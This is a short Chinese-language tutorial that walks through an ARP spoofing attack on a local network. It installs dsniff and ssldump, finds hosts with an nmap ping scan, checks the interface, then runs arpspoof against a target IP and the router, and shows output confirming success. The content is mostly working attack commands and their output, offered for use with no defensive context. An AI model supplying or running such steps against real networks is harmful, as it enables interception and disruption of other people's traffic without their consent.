1 安装软件包
在中端中执行:
apt install dsniff ssldump
2 搜索局域网内的ip地址:
nmap -sn 192.168.0.*
这里的192.168.0.*有的是192.168.1.*
执行结果:
Nmap scan report for 192.168.0.1Host is up (0.00054s latency).MAC Address: -:-:-:-:-:- (Tp-link Technologies)#以上是第一个设备Nmap scan report for 192.168.0.103Host is up (0.11s latency).MAC Address: -:-:-:-:-:- (Unknown)#第二个设备
3 查看网卡信息
ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500inet 192.168.0.108 netmask 255.255.255.0 broadcast 192.168.0.255inet6 fe80::4216:7eff:feac:e956 prefixlen 64 scopeid 0x20<link>ether -:-:-:-:-:- txqueuelen 1000 (Ethernet)RX packets 252997 bytes 328230065 (313.0 MiB)RX errors 0 dropped 5 overruns 0 frame 0TX packets 128705 bytes 13802826 (13.1 MiB)TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536inet 127.0.0.1 netmask 255.0.0.0inet6 ::1 prefixlen 128 scopeid 0x10<host>loop txqueuelen 1000 (Local Loopback)RX packets 12 bytes 600 (600.0 B)RX errors 0 dropped 0 overruns 0 frame 0TX packets 12 bytes 600 (600.0 B)TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
记住这个eth0 (有线网),有的时候还可能是wlan0 (无线网)
4 开始攻击
假设我要攻击的设备的ip是 192.168.0.103
在中端中输入:
arpspoof -i eth0 -t 192.168.0.103 -r 192.168.0.1#格式 arpspoof -i eth0/wlan0 -t 要攻击的ip -r 192.168.0.1
如果有下面这样的输出那么就成功了
40:16:7e:ac:e9:56 0:0:0:0:0:0 0806 42: arp reply 192.168.0.1 is-at 40:16:7e:ac:e9:5640:16:7e:ac:e9:56 60:3a:7c:30:aa:3 0806 42: arp reply 192.168.0.3 is-at 40:16:7e:ac:e9:5640:16:7e:ac:e9:56 0:0:0:0:0:0 0806 42: arp reply 192.168.0.1 is-at 40:16:7e:ac:e9:56
按 Ctrl + C 停止攻击